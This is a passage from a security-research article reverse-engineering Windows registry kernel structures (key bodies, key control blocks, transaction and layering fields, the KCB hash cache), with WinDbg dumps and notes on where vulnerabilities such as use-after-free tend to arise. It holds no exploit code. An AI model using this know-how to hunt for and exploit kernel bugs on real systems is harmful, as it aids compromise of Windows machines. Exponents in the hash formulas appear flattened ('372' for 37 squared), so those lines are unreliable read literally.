    • CM_HIVE_MUST_BE_REORGANIZED: the hive fragmentation threshold (by default 1 MiB) has been exceeded, and the hive should undergo the reorganization process at the next opportunity. The flag is simply a means of communication between the CmCheckRegistry and CmpReorganizeHive internal routines, both of which execute during hive loading.
    • CM_HIVE_DIFFERENCING_WRITETHROUGH: this is a delta hive loaded in the writethrough mode, which technically means that the DIFF_HIVE_WRITETHROUGH flag was specified in the DiffHiveFlags member of the VRP_LOAD_DIFFERENCING_HIVE_INPUT structure, as discussed in Part 4.
    • CM_HIVE_CLOUDFILTER_PROTECTED: new flag added in December 2024 as part of the fix for CVE-2024-49114. It indicates that the hive file has been protected against being converted to a Cloud Filter placeholder by setting the "$Kernel.CFDoNotConvert" extended attribute (EA) on the file in CmpAdjustFileCFSafety.

    This concludes the documentation of the hive descriptor structure, arguably the largest and most complex object in the Windows registry implementation.

    Key structures

    The second most important objects in the registry are keys. They can be basically thought of as the essence of the registry, as nearly every registry operation involves them in some way. They are also the one and only registry element that is tightly integrated with the Windows NT Object Manager. This comes with many benefits, as client applications can operate on the registry using standardized handles, and can leverage automatic security checks and object lifetime management. However, this integration also presents its own challenges, as it requires the Configuration Manager to interact with the Object Manager correctly and handle its intricacies and edge cases securely. For this reason, internal key-related structures play a crucial role in the registry implementation. They help organize key state in a way that simplifies keeping it up-to-date and internally consistent. For security researchers, understanding these structures and their semantics is invaluable. This knowledge enables you to quickly identify bugs in existing code or uncover missing handling of unusual but realistic conditions.

    The two fundamental key structures in the Windows kernel are the key body (_CM_KEY_BODY) and key control block (_CM_KEY_CONTROL_BLOCK). The key body is directly associated with a key handle in the NT Object Manager, similar to the role that the _FILE_OBJECT structure plays for file handles. In other words, this is the initial object that the kernel obtains whenever it calls ObReferenceObjectByHandle to reference a user-supplied handle. There may concurrently exist a number of key body structures associated with a single key, as long as there are several programs holding active handles to the key. Conversely, the key control block represents the global state of a specific key and is used to manage its general properties. This means that for most keys in the system, there is at most one KCB allocated at a time. There may be no KCB for keys that haven't been accessed yet (as they are initialized by the kernel lazily), and there may be more than one KCB for the same registry path if the key has been deleted and created again (these two instances of the key are treated as separate entities, with one of them being marked as deleted/non-existent). Taking this into account, the relationship between key bodies and KCBs is many-to-one, with all of the key bodies of a single KCB being connected in a doubly-linked list, as shown in the diagram below:

    Diagram illustrating the many-to-one relationship between Windows Registry Key Bodies and a Key Control Block (KCB). A single KCB is shown linked to multiple Key Body structures. These Key Bodies are themselves connected together in a doubly-linked list, which is associated with the parent KCB.

    The following subsections provide more detail about each of these two structures.

    Key body

    The key body structure is allocated and initialized in the internal CmpCreateKeyBody routine, and freed by the NT Object Manager when all references to the object are dropped. It is a relatively short and simple object with the following definition:

    0: kd> dt _CM_KEY_BODY

    nt!_CM_KEY_BODY

       +0x000 Type             : Uint4B

       +0x004 AccessCheckedLayerHeight : Uint2B

       +0x008 KeyControlBlock  : Ptr64 _CM_KEY_CONTROL_BLOCK

       +0x010 NotifyBlock      : Ptr64 _CM_NOTIFY_BLOCK

       +0x018 ProcessID        : Ptr64 Void

       +0x020 KeyBodyList      : _LIST_ENTRY

       +0x030 Flags            : Pos 0, 16 Bits

       +0x030 HandleTags       : Pos 16, 16 Bits

       +0x038 Trans            : _CM_TRANS_PTR

       +0x040 KtmUow           : Ptr64 _GUID

       +0x048 ContextListHead  : _LIST_ENTRY

       +0x058 EnumerationResumeContext : Ptr64 Void

       +0x060 RestrictedAccessMask : Uint4B

       +0x064 LastSearchedIndex : Uint4B

       +0x068 LockedMemoryMdls : Ptr64 Void


    Let's quickly go over each field:

    • Type: for normal keys (i.e. almost all of them), this field is set to a magic value of 0x6B793032 ('ky02'). However, for predefined keys, this is the 32-bit value of the link's target key with the highest bit set. This member is therefore used to distinguish between regular keys and predefined ones, for example in CmObReferenceObjectByHandle. Predefined keys have been now largely deprecated, but it is still possible to observe a non-standard Type value by opening a handle to one of the two last remaining ones: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Perflib\009 and CurrentLanguage under the same path.
    • AccessCheckedLayerHeight: a new field added in November 2023 as part of the fix for CVE-2023-36404. It is used for layered keys and contains the index of the lowest layer in the key stack that was access-checked when opening the key. It is later taken into account during other registry operations, in order to avoid leaking data from lower-layer, more restrictive keys that could have been created since the handle was opened.
    • KeyControlBlock: a pointer to the corresponding key control block.
    • NotifyBlock: an optional pointer to the notify block associated with this handle. This is related to the key notification functionality in Windows and is described in more detail in the "Key notification structures" section below.
    • ProcessID: the PID of the process that created the handle. It doesn't seem to serve any purpose in the kernel other than to be enumerable using the NtQueryOpenSubKeysEx system call (which requires SeRestorePrivilege, and is therefore available to administrators only).
    • KeyBodyList: the list entry used to link all the key bodies within a single KCB together.
    • Flags: a set of flags concerning the specific key body. Here's my interpretation of them based on reverse engineering:
    • KEY_BODY_HIVE_UNLOADED (0x1): indicates that the underlying hive of the key has been unloaded and is no longer active.
    • KEY_BODY_DONT_RELOCK (0x2): this seems to be a short-term flag used to communicate between CmpCheckKeyBodyAccess/CmpCheckOpenAccessOnKeyBody and the nested CmpDoQueryKeyName routine, in order to indicate that the key's KCB is already locked and shouldn't be relocked again.
    • KEY_BODY_DONT_DEINIT (0x4): if this flag is set, CmpDeleteKeyObject returns early and doesn't proceed with the regular deinitialization of the key body object. However, it is unclear if/where the flag is set in the code, as I personally haven't found any instances of it happening during my analysis.
    • KEY_BODY_DELETED (0x8): indicates that the key has been deleted since the handle was opened, and it no longer exists.
    • KEY_BODY_DONT_VIRTUALIZE (0x10): indicates that registry virtualization is disabled for this handle, as a result of opening the key with the (undocumented but present in SDK headers) REG_OPTION_DONT_VIRTUALIZE flag.
    • HandleTags: from the kernel perspective, this is simply a general purpose 16-bit storage that can be set by clients on a per-handle basis using NtSetInformationKey with the KeySetHandleTagsInformation information class, and queried with NtQueryKey and the KeyHandleTagsInformation information class. As far as I know, the kernel doesn't dictate how this field should be used and leaves it up to the registry clients. In practice, it seems to be mostly used for purposes related to WOW64 and the Registry Redirector, storing flags such as KEY_WOW64_64KEY (0x100) and KEY_WOW64_32KEY (0x200), as well as some internal ones. The WOW64 functionality is implemented in KernelBase.dll, and functions such as ConstructKernelKeyPath and LocalBaseRegOpenKey are a good starting point for reverse engineering, if you're curious to learn more. I have also observed the 0x1000 handle tag being set in the internal IopApplyMutableTagToRegistryKey kernel routine for keys such as HKLM\System\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000, but I'm unsure of its meaning.
    • Trans: Indicates the transactional state of the handle. If the handle is not transacted (i.e. it wasn't opened with one of RegOpenKeyTransacted or RegCreateKeyTransacted), it is set to zero. Otherwise, the lowest bit specifies the type of the transaction: 0 for KTM and 1 for lightweight transactions. The remaining bits form a pointer to the associated transaction object, either of the TmTransactionObjectType type (represented by the _KTRANSACTION structure), or of the CmRegistryTransactionType type (represented by a non-public structure that I've personally named _CM_LIGHTWEIGHT_TRANS_OBJECT).
    • KtmUow: if the handle is associated with a KTM transaction, this field stores the GUID that uniquely identifies it. For non-transacted and lightweight-transacted handles, the field is unused.
    • ContextListHead: this is the head of the doubly-linked list of contexts that have been associated with the key body using the CmSetCallbackObjectContext function. It is related to the registry callbacks functionality; see also the Specifying Context Information MSDN article for more details.
    • EnumerationResumeContext: this is part of an optimization of the subkey enumeration process of layered keys (implemented in CmpEnumerateLayeredKey). Performing full enumeration of a layered key from scratch up to the given index is a very complex task, and repeating it over and over for each iteration of an enumeration loop would be very inefficient. The resume context helps address the problem for sequential enumeration by saving the intermediate state reached at an NtEnumerateKey call with a given index, and being able to resume from it when a request for index+1 comes next. It also has the added benefit of making it possible to stop and restart the enumeration process in the scope of a single system call, which is used to pause the operation and temporarily release some locks if the code detects that the registry is particularly congested. This happens at the intersection of the CmEnumerateKey and CmpEnumerateLayeredKey functions, with the latter potentially returning STATUS_RETRY and the former resuming the operation if such a situation arises.
    • RestrictedAccessMask, LastSearchedIndex, LockedMemoryMdls: relatively new fields introduced in Windows 10 and 11, which I haven't looked very deeply into and thus won't discuss in detail here.

    After a key handle is translated into the corresponding _CM_KEY_BODY structure using the ObReferenceObjectByHandle(CmKeyObjectType) call, typically early in the execution of a registry-related system call, there are three primary operations that are usually performed. First, the kernel does a key status check by evaluating the expression KeyBody.Flags & 9 to determine if the key is associated with an unloaded hive (flag 0x1) or has been deleted (flag 0x8). This check is essential because most registry operations are only permitted on active, existing keys, and enforcing this condition is a fundamental step for guaranteeing registry state consistency. Second, the code accesses the KeyControlBlock pointer, which provides further access to the hive pointer (KCB.KeyHive), the key's cell index (KCB.KeyCell), and other necessary fields and data structures required to perform any meaningful read/write actions on the key. Finally, the code checks the key body's Trans/KtmUow members to determine if the handle is part of a transaction, and if so, the transaction is used as additional context for the action requested by the caller. Accesses to other members of the _CM_KEY_BODY structure are less frequent and serve more specialized purposes.

    Key control block

    The key control block object can be thought of as the heart of the Windows kernel registry tree representation. It is effectively the descriptor of a single key in the system, and the second most important key-related object after the key node. It is always allocated from the kernel pool, and serves four main purposes:

    1. Mirrors frequently used information from the key node to make it faster to access by the kernel code. This includes building an efficient, in-memory representation of the registry tree to optimize the traversal time when referring to registry paths.
    2. Works as a single point of reference for all active handles to a specific key, and helps synchronize access to the key in the multithreaded Windows environment.
    3. Represents any pending, transacted state of the registry key that has been introduced by a client, but not fully committed yet.
    4. Represents any complex relationships between registry keys that extend beyond the internal structure of the hive. The primary example are differencing hives, which are overlaid on top of each other, and whose corresponding keys form so-called key stacks.

    Blog post #2 in this series highlighted the dramatic growth of the registry codebase across successive Windows versions, illustrating the subsystem's steady expansion over the last few decades. Similarly, the size of the Key Control Block (KCB) itself has nearly doubled in time, from 168 bytes in Windows XP x64 to 312 bytes in the latest Windows 11 release. This expansion underscores the increasing amount of information associated with every registry key, which the kernel must manage consistently and securely.

    The KCB structure layout is present in the PDB symbols and can be displayed in WinDbg:

    0: kd> dt _CM_KEY_CONTROL_BLOCK

    nt!_CM_KEY_CONTROL_BLOCK

       +0x000 RefCount         : Uint8B

       +0x008 ExtFlags         : Pos 0, 16 Bits

       +0x008 Freed            : Pos 16, 1 Bit

       +0x008 Discarded        : Pos 17, 1 Bit

       +0x008 HiveUnloaded     : Pos 18, 1 Bit

       +0x008 Decommissioned   : Pos 19, 1 Bit

       +0x008 SpareExtFlag     : Pos 20, 1 Bit

       +0x008 TotalLevels      : Pos 21, 10 Bits

       +0x010 KeyHash          : _CM_KEY_HASH

       +0x010 ConvKey          : _CM_PATH_HASH

       +0x018 NextHash         : Ptr64 _CM_KEY_HASH

       +0x020 KeyHive          : Ptr64 _HHIVE

       +0x028 KeyCell          : Uint4B

       +0x030 KcbPushlock      : _EX_PUSH_LOCK

       +0x038 Owner            : Ptr64 _KTHREAD

       +0x038 SharedCount      : Int4B

       +0x040 DelayedDeref     : Pos 0, 1 Bit

       +0x040 DelayedClose     : Pos 1, 1 Bit

       +0x040 Parking          : Pos 2, 1 Bit

       +0x041 LayerSemantics   : UChar

       +0x042 LayerHeight      : Int2B

       +0x044 Spare1           : Uint4B

       +0x048 ParentKcb        : Ptr64 _CM_KEY_CONTROL_BLOCK

       +0x050 NameBlock        : Ptr64 _CM_NAME_CONTROL_BLOCK

       +0x058 CachedSecurity   : Ptr64 _CM_KEY_SECURITY_CACHE

       +0x060 ValueList        : _CHILD_LIST

       +0x068 LinkTarget       : Ptr64 _CM_KEY_CONTROL_BLOCK

       +0x070 IndexHint        : Ptr64 _CM_INDEX_HINT_BLOCK

       +0x070 HashKey          : Uint4B

       +0x070 SubKeyCount      : Uint4B

       +0x078 KeyBodyListHead  : _LIST_ENTRY

       +0x078 ClonedListEntry  : _LIST_ENTRY

       +0x088 KeyBodyArray     : [4] Ptr64 _CM_KEY_BODY

       +0x0a8 KcbLastWriteTime : _LARGE_INTEGER

       +0x0b0 KcbMaxNameLen    : Uint2B

       +0x0b2 KcbMaxValueNameLen : Uint2B

       +0x0b4 KcbMaxValueDataLen : Uint4B

       +0x0b8 KcbUserFlags     : Pos 0, 4 Bits

       +0x0b8 KcbVirtControlFlags : Pos 4, 4 Bits

       +0x0b8 KcbDebug         : Pos 8, 8 Bits

       +0x0b8 Flags            : Pos 16, 16 Bits

       +0x0bc Spare3           : Uint4B

       +0x0c0 LayerInfo        : Ptr64 _CM_KCB_LAYER_INFO

       +0x0c8 RealKeyName      : Ptr64 Char

       +0x0d0 KCBUoWListHead   : _LIST_ENTRY

       +0x0e0 DelayQueueEntry  : _LIST_ENTRY

       +0x0e0 Stolen           : Ptr64 UChar

       +0x0f0 TransKCBOwner    : Ptr64 _CM_TRANS

       +0x0f8 KCBLock          : _CM_INTENT_LOCK

       +0x108 KeyLock          : _CM_INTENT_LOCK

       +0x118 TransValueCache  : _CHILD_LIST

       +0x120 TransValueListOwner : Ptr64 _CM_TRANS

       +0x128 FullKCBName      : Ptr64 _UNICODE_STRING

       +0x128 FullKCBNameStale : Pos 0, 1 Bit

       +0x128 Reserved         : Pos 1, 63 Bits

       +0x130 SequenceNumber   : Uint8B


    I will not document each member individually, but will instead cover them in larger groups according to their common themes and functions.

    Reference count

    Key Control Blocks are among the most frequently referenced registry objects, as almost every persistent registry operation involves an associated KCB. These blocks are referenced in various ways: by a subkey's KCB.ParentKcb pointer, a symbolic link key's KCB.LinkTarget pointer, through the global KCB tree, via open key handles (and the corresponding key bodies), in pending transacted operations (e.g., the _CM_KCB_UOW.KeyControlBlock pointer), and so on.

    For system stability and security, it's crucial to accurately track all these active KCB references. This is done using the RefCount field, the first member in the KCB structure (offset 0x0). Historically a 16-bit field, it became a 32-bit integer, and on modern systems, it is a native word size—typically 64-bits on most computers. Whenever kernel code needs to operate on a KCB or store a pointer to it, it should increment the RefCount using functions from the CmpReferenceKeyControlBlock family. Conversely, when a KCB reference is no longer needed, functions like CmpDereferenceKeyControlBlock should decrement the count. When RefCount reaches zero, the kernel knows the structure is no longer in use and can safely free it.

    Besides standard reference counting, KCBs employ optimizations to delay certain memory management processes. This avoids excessive KCB allocation and deallocation when a KCB is briefly unreferenced. Two mechanisms are used: delay deref and delay close. The former delays the actual refcount decrement, while the latter postpones object deallocation even after RefCount reaches zero. Callers must use the specialized function CmpDelayDerefKeyControlBlock for the delayed dereference.

    From a low-level security perspective, it's worth considering potential issues related to the reference counting. Integer overflow might seem like a possibility, but it's practically impossible due to the field's width and additional overflow protection present in the CmpReferenceKeyControlBlock-like functions. A more realistic concern is a scenario where the kernel accidentally decrements the refcount by a larger value than the number of released references. This could lead to premature KCB deallocation and a use-after-free condition. Therefore, accurate KCB reference counting is a crucial area to investigate when researching Windows for registry vulnerabilities.

    Basic key information

    As mentioned earlier, one of the most important types of information in the KCB is the unique identifier of the key in the hive, consisting of the _HHIVE descriptor pointer (KeyHive) and the corresponding key cell index (KeyCell). Very frequently, the kernel uses these two members to obtain the address of the key node mapping, which resembles the following pattern in the decompiled code:

    _HHIVE *Hive = Kcb->KeyHive;

    _CM_KEY_NODE *KeyNode = Hive->GetCellRoutine(Hive, Kcb->KeyCell);

    //

    // Further operations on KeyNode...

    //

    Cached data from the key node

    Whenever some information about a key needs to be queried based on its handle, it is generally more efficient to read it from the KCB than the key node. The reason is that a pool-based KCB access requires fewer memory fetches (it avoids the cell map walk), bypasses the context switch to the Registry process, and eliminates the potential need to page in hive data from disk. Consequently, the following types of information are cached inside KCBs:

    • Key name, which is stored in a public _CM_NAME_CONTROL_BLOCK structure and pointed to by the NameBlock member. Every unique key name in the system has its own instance of the _CM_NAME_CONTROL_BLOCK object, which is reference-counted and shared across all KCBs of keys with that name. This is an optimization designed to prevent storing multiple redundant copies of the same string in kernel memory.
    • Flags, stored in the Flags member and being an exact copy of the _CM_KEY_NODE.Flags value. There is also the KcbUserFlags field that caches the value of _CM_KEY_NODE.UserFlags, and KcbVirtControlFlags, which caches the value of _CM_KEY_NODE.VirtControlFlags. The semantics of all of these bitmasks were discussed in Part 5.
    • Security descriptor, stored in a separate _CM_KEY_SECURITY_CACHE structure and pointed to by CachedSecurity.
    • Subkey count, stored in the SubKeyCount field. It expresses the cumulative number of the key's stable and volatile subkeys, i.e. it is equal to the sum of _CM_KEY_NODE.SubKeyCounts[0] and SubKeyCounts[1].
    • Value list, stored in the ValueList structure of type _CHILD_LIST, and equivalent to _CM_KEY_NODE.ValueList.
    • Key limits, represented by KcbMaxNameLen, KcbMaxValueNameLen and KcbMaxValueDataLen. They correspond to the key node fields with the same names without the "Kcb" prefix.
    • Fully qualified path, stored in FullKCBName. It is lazily initialized in the internal CmpConstructAndCacheName function, either when resolving a symbolic link, or as a result of calling the documented CmCallbackGetKeyObjectID API. A previously initialized path may be marked as stale by setting FullKCBNameStale (the least significant bit of the FullKCBName pointer).

    It is essential for system security that the information found in KCBs is always synchronized with their key node counterparts. This is one of the most fundamental assumptions of the Windows registry implementation, and failure to guarantee it typically results in memory corruption or other severe security vulnerabilities.

    Extended flags

    In addition to the flags fields that simply mirror the corresponding values from the key node, like Flags, KcbUserFlags and KcbVirtControlFlags, there is also a set of extended flags that are KCB-specific. They are stored in the following fields:

       +0x008 ExtFlags         : Pos 0, 16 Bits

       +0x008 Freed            : Pos 16, 1 Bit

       +0x008 Discarded        : Pos 17, 1 Bit

       +0x008 HiveUnloaded     : Pos 18, 1 Bit

       +0x008 Decommissioned   : Pos 19, 1 Bit

       +0x008 SpareExtFlag     : Pos 20, 1 Bit

    [...]

       +0x040 DelayedDeref     : Pos 0, 1 Bit

       +0x040 DelayedClose     : Pos 1, 1 Bit

       +0x040 Parking          : Pos 2, 1 Bit


    For the eight explicitly defined flags, here's a brief explanation:

    • Freed: the KCB has been freed, but the underlying pool allocation may still be alive as part of the CmpFreeKCBListHead (older systems) or CmpKcbLookaside (Windows 10 and 11) lookaside lists.
    • Discarded: the KCB has been unlinked from the global KCB tree and is not available for name-based lookups, but there may still be active references to it via open handles. It is typically set for keys that have been deleted, and for old instances of keys that have been renamed.
    • HiveUnloaded: the underlying hive has been unloaded.
    • Decommissioned: the KCB is no longer used (its reference count dropped to zero) and it is ready to be freed, but it hasn't been freed just yet.
    • SpareExtFlag: as the name suggests, this is a spare bit that may be associated with a new flag in the future.
    • DelayedDeref: the key is subject to a "delayed deref" mechanism, due to having been dereferenced using CmpDelayDerefKeyControlBlock instead of CmpDereferenceKeyControlBlock. This serves to defer the actual dereferencing of the KCB by some time, anticipating its near-future need and thus avoiding a redundant free-allocate sequence.
    • DelayedClose: the key is subject to a "delayed close" mechanism, which is similar to delayed deref, but it involves delaying the freeing of a KCB structure even if its refcount has dropped to zero.
    • Parking: the purpose of this bit is unclear, and it seems to be currently unused.

    Last but not least, the ExtFlags member stores a further set of flags, which can be expressed as the following enum:

    enum _CM_KCB_EXT_FLAGS

    {

      CM_KCB_NO_SUBKEY           = 0x1,

      CM_KCB_SUBKEY_ONE          = 0x2,

      CM_KCB_SUBKEY_HINT         = 0x4,

      CM_KCB_SYM_LINK_FOUND      = 0x8,

      CM_KCB_KEY_NON_EXIST       = 0x10,

      CM_KCB_NO_DELAY_CLOSE      = 0x20,

      CM_KCB_INVALID_CACHED_INFO = 0x40,

      CM_KCB_READ_ONLY_KEY       = 0x80,

      CM_KCB_READ_ONLY_SUBKEY    = 0x100,

    };


    Let's break it down:

    • CM_KCB_NO_SUBKEY, CM_KCB_SUBKEY_ONE, CM_KCB_SUBKEY_HINT: these flags are currently obsolete, and were originally related to an old performance optimization. CM_KCB_NO_SUBKEY indicated that the key had no subkeys. CM_KCB_SUBKEY_ONE indicated that the key had exactly one subkey, and its 32-bit hint value was stored in KCB.HashKey. Finally, CM_KCB_SUBKEY_HINT indicated that the hints of all subkeys were stored in a dynamically allocated buffer pointed to by KCB.IndexHint. According to my analysis, none of the flags seem to be used in modern versions of Windows, even though their related fields in the KCB structure still exist.
    • CM_KCB_SYM_LINK_FOUND: indicates that the key is a symbolic link whose target KCB has already been resolved during a previous access, and is cached in KCB.CachedChildList.RealKcb (older systems) or KCB.LinkTarget (Windows 10 and 11). It is an optimization designed to speed up the process of traversing symlinks, by performing the path lookup only once and later referring directly to the cached KCB where possible.
    • CM_KCB_KEY_NON_EXIST: this is another deprecated flag that existed in historical implementations of the registry, but doesn't seem to be used anymore.
    • CM_KCB_NO_DELAY_CLOSE: indicates that the key mustn't be subject to the "delayed close" mechanism, and instead should be freed as soon as all references to it are dropped.
    • CM_KCB_INVALID_CACHED_INFO: this flag simply indicates that the IndexHint/HashKey/SubKeyCount fields contain out-of-date information that shouldn't be relied on.
    • CM_KCB_READ_ONLY_KEY: this key is designated as read-only and, therefore, is not modifiable. The flag can be set by using the undocumented NtLockRegistryKey system call, which can only be called from kernel-mode. Shout out to James Forshaw who wrote an interesting post about it on his blog.
    • CM_KCB_READ_ONLY_SUBKEY: the exact meaning and usage of the flag is unclear, but it appears to be enabled for keys with at least one descendant subkey marked as read-only. Specifically, the internal CmLockKeyForWrite function (the main routine behind NtLockRegistryKey's logic) sets it iteratively for every parent key of the read-only key, up to and including the hive's root.

    Key body list

    To optimize access, the KCB stores the first four key body handles in the KeyBodyArray for fast, lockless access. The KeyBodyListHead field maintains the head of a doubly-linked list for any additional handles.

    KCB lock

    The KcbPushlock member within the KCB structure is a lock used to synchronize access to the key during various registry system calls. This lock is passed to standard kernel pushlock APIs, such as ExAcquirePushLockSharedEx, ExAcquirePushLockExclusiveEx, and ExReleasePushLockEx

    Transacted state

    The key control block is central to managing the transacted state of registry keys, maintaining pending changes in memory before they are committed to the hive. Several fields within the KCB are specifically dedicated to this function:

    • KCBUoWListHead: This field is a list head that anchors a list of Unit of Work (UoW) structures. Each UoW represents a specific action taken within a transaction, such as creating, deleting a key or setting or deleting a value. This list allows the system to track all pending transactional operations related to a particular key, and it is crucial for ensuring atomicity, as it records the operations that must be applied or rolled back as a single unit.
    • TransKCBOwner: This field is used to identify the transaction object that "owns" the key. It is set on the KCBs of transactionally created keys, and signifies that the key is currently only visible in the context of the specific transaction. Once the transaction commits, this field is cleared, and the key becomes visible in the global registry tree.
    • KCBLock and KeyLock: Two so-called intent locks of type _CM_INTENT_LOCK, which are used to ensure that no two transactions can be associated with a single key if their respective operations could invalidate each other's state. According to my understanding, KCBLock protects the consistency of the KCB in this regard, and KeyLock protects the key node. The !reg ixlock WinDbg command is designed to display the internal state of these locks.
    • TransValueCache: This field is a structure that caches value entries associated with a particular KCB, if at least one of its values has been modified in an active transaction. Before a value is set, modified or deleted within a transaction for the first time, a copy of the current value list is taken and stored here. When a transaction is committed, the TransValueCache state is applied back to the key's persistent value list. On rollback, the list is simply discarded.
    • TransValueListOwner: This field is a pointer to a transaction that currently "owns" the TransValueCache. At any given time, for each key, there may be at most one active transaction that has any pending operations involving the key's values.

    These fields collectively form the core transaction management within the Windows Registry. Ever since their introduction in Windows Vista, they need to be correctly handled as part of every registry action, be it a read/write one, a transacted/non-transacted one etc. This is because the kernel must potentially incorporate any transacted state in any information queries, and must similarly pay attention not to allow the existence of two contradictory transactions at the same time, and not to allow a non-transacted operation to break any assumptions of an active transaction without invalidating it first. And any bugs related to managing the transacted state may have significant security implications, with some interesting examples being CVE-2023-21748 and CVE-2023-23420. The specific structures used to store the transacted state, such as _CM_TRANS or _CM_KCB_UOW, are discussed in more detail in the "Transaction structures" section below.

    Layered key state

    Layered keys were introduced in Windows 10 version 1607 to support containerisation through differencing hives. Because overlaying hives on top of each other is primarily a runtime concept, the Key Control Block (KCB) is the natural place to hold the state related to this feature, and there are three main members involved in this process:

    • LayerSemantics: This 2-bit field indicates the state of a key within the layering system. It is an exact copy of the key's _CM_KEY_NODE.LayerSemantics value, cached in KCB for easier/quicker access. For a detailed overview of its possible values, please refer to Part 5.
    • LayerHeight: This field specifies the level of the key within the differencing hive stack. A higher LayerHeight indicates that the key is higher up in the stack of layered hives, and a value of zero is used for base hives (i.e. normal non-differencing hives loaded on the host system).
    • LayerInfo: This is a pointer to a _CM_KCB_LAYER_INFO structure, which describes the key's position within the stack of differencing hives. Among other things, it contains a pointer to the lower layer on the key stack, and the head of a list of layers above the current one.

    The specifics of the structures associated with this functionality are discussed in the "Layered keys" section below.

    KCB tree structure

    While key bodies are a common way to access KCB structures, they're not the only method. They are integral when you have an open handle to a key, as operations on the handle follow the handle → key body → KCB translation path. However, looking up keys by name or path is also crucial. Whether a key is opened or created, it relies on either an existing handle and a relative path (single subkey name or a longer path with backslash-separated names), or an absolute path starting with "\Registry\". In this scenario, the kernel needs to quickly check if a KCB exists for the given key and to obtain its address if it does. To achieve this, KCBs are organized into their own tree structure, which the kernel can traverse. The tree is rooted in CmpRegistryRootObject (specifically CmpRegistryRootObject->KeyControlBlock, as CmpRegistryRootObject itself is the key body representing the \Registry key), and mirrors the current registry layout from a high-level perspective.

    Diagram illustrating the Windows Registry Key Control Block (KCB) tree structure used for key lookups by name or path. The tree starts with the REGISTRY root, branching into top-level keys like MACHINE and USER. It further details the hierarchy under MACHINE, showing SOFTWARE linked to another SOFTWARE node which contains keys like Classes, Microsoft, and Windows NT, mirroring the registry's layout. Cloud symbols indicate deeper nesting within the structure.

    Let's highlight several key points:

    • KCB Existence: There's no guarantee that a corresponding KCB exists for every registry key. KCBs are allocated lazily only when a key is opened, created, or when a KCB that depends on the one being created is about to be allocated.
    • Consistent KCB Tree Structure: The KCB tree structure is always consistent. If a KCB exists for a key, then KCBs for all its ancestors up to the root \Registry key must also exist.
    • Cached Information in KCBs: KCBs contain cached information from the key node, plus additional runtime information that may not yet be in the hive (e.g., pending transactions). Before performing any operation on a key, it's crucial to consult its KCB.
    • KCB Uniqueness: At any given time, there can be only one KCB corresponding to a specific key attached to the tree. It's possible for multiple KCBs of the same key to exist in memory, but only if some of them correspond to deleted instances, in which case they are no longer visible in the global tree (only through the handles, until they are closed). Before creating a new KCB, the kernel should always ensure that there isn't an existing one, and if there is, use it. Failing to maintain this invariant can lead to severe consequences, as illustrated by CVE-2023-23420.
    • KCB Tree and Hives: The KCB tree combines key descriptors from different hives and therefore must implement support for "exit nodes" and "entry nodes", as described in the previous blog post. Both exit and entry nodes have corresponding KCBs that can be viewed and analyzed in WinDbg. Resolving transitions between exit and entry nodes generally involves reading the (_HHIVE*, root cell index) pair from the exit node and then locating and navigating to the corresponding KCB in the destination hive. To speed up this process, the kernel uses an optimization that sets the CM_KCB_SYM_LINK_FOUND flag (0x8) in the exit node's KCB and stores the entry node's KCB address in KCB.LinkTarget, simulating a resolved symbolic link and avoiding the need to look up the entry's KCB every time the key is traversed. In the diagram above, entry keys are marked in blue, exit nodes in orange, and the special connection between them by the connector with black squares.
    • Key Depth: Every open key in the system has a depth in the global tree, representing the number of nesting levels separating it from the root. This value is stored in the TotalLevels field. For example, the root key \Registry has a depth of 1, and the key \Registry\Machine\Software\Microsoft\Windows has a depth of 5.
    • Parent KCB Pointer: Every initialized KCB structure (whether attached to the tree or not) contains a pointer to its parent KCB in the ParentKcb field. The only exception is the global root \Registry, for which this pointer is NULL.

    Now that we understand how the KCB tree works conceptually, let's examine how it is represented in memory. Interestingly, the KCB structure itself doesn't store a list of its subkeys. Instead, it relies on a simple 32-bit hash of the text string for fast lookups by name. The hash is calculated by multiplying successive characters of the string by powers of 37, where the first character is multiplied by the highest power and the last by the lowest (370, which is 1). This allows for a straightforward iterative implementation, shown below in C code:

    uint32_t HashString(const std::string& str) {

      uint32_t hash = 0;

      for (size_t i = 0; i < str.size(); i++) {

        hash = hash * 37 + toupper(str[i]);

      }

      return hash;

    }


    Some example outputs of the algorithm are:

    HashString("Microsoft")      = 0x7f00cd26

    HashString("Windows")        = 0x2f7de68b

    HashString("CurrentVersion") = 0x7e25f69d


    To calculate the hash of a path with multiple components, the same algorithm steps are repeated. However, in this case, the hashes of the successive path parts are treated similarly to the letters in the previous example. Therefore, the following formula is used to calculate the hash of the full "Microsoft\Windows\CurrentVersion" path:

    0x7f00cd26 × 372 + 0x2f7de68b × 371 + 0x7e25f69d × 370 = 0x86a158ea


    The hash value calculated for each key, based on its path relative to the hive's root, is stored in KCB.ConvKey.Hash. Consequently, the hash value for the standard system key HKLM\Software\Microsoft\Windows\CurrentVersion is 0x86a158ea.

    Every hive has a directory of the KCBs within it, structured as a hashmap with a fixed number of buckets. Each bucket comprises a linked list of the KCBs located there. Internally, this directory is referred to as the "KCB cache" and is represented by the following two fields in the _CMHIVE structure:

       +0x670 KcbCacheTable    : Ptr64 _CM_KEY_HASH_TABLE_ENTRY

       +0x678 KcbCacheTableSize : Uint4B


    KcbCacheTable is a pointer to a dynamically allocated array of _CM_KEY_HASH_TABLE_ENTRY structures, and KcbCacheTableSize specifies the number of buckets (i.e., the number of elements in the KcbCacheTable array). In practice, the size of this KCB cache is 128 buckets for the virtual \Registry hive, 512 for the vast majority of hives loaded in the system, and 1024 for two specific system hives: HKLM\Software and HKLM\System. Given a specific key with a name hash denoted as ConvKey, its KCB can be found in the cache bucket indexed as follows:

    TmpHash = 101027 * (ConvKey ^ (ConvKey >> 9));

    CacheIndex = (TmpHash ^ (TmpHash >> 9)) & (Hive->KcbCacheTableSize - 1);

    //

    // Kcb can be found in Hive->KcbCacheTable[CacheIndex]

    //


    The operation of translating a key's path hash to its KCB cache table index (excluding the modulo KcbCacheTableSize step) is called "finalization". There's even a WinDbg helper command that can perform this action for us: !reg finalize. We can test it on the hash we calculated for the "Microsoft\Windows\CurrentVersion" path:

    0: kd> !reg finalize 0x86a158ea

    Finalized Hash for Hash=0x86a158ea: 0xc2c65312


    So, the finalized hash is 0xc2c65312, and since the KCB cache hive size of the SOFTWARE hive is 1024, this means that the index of the HKLM\Software\Microsoft\Windows\CurrentVersion key in the array will be the lowest 10 bits, or 0x312. We can verify that our calculations are correct by finding the SOFTWARE hive in memory and listing the keys located in its individual buckets:

    0: kd> !reg hivelist

    ah

    ...

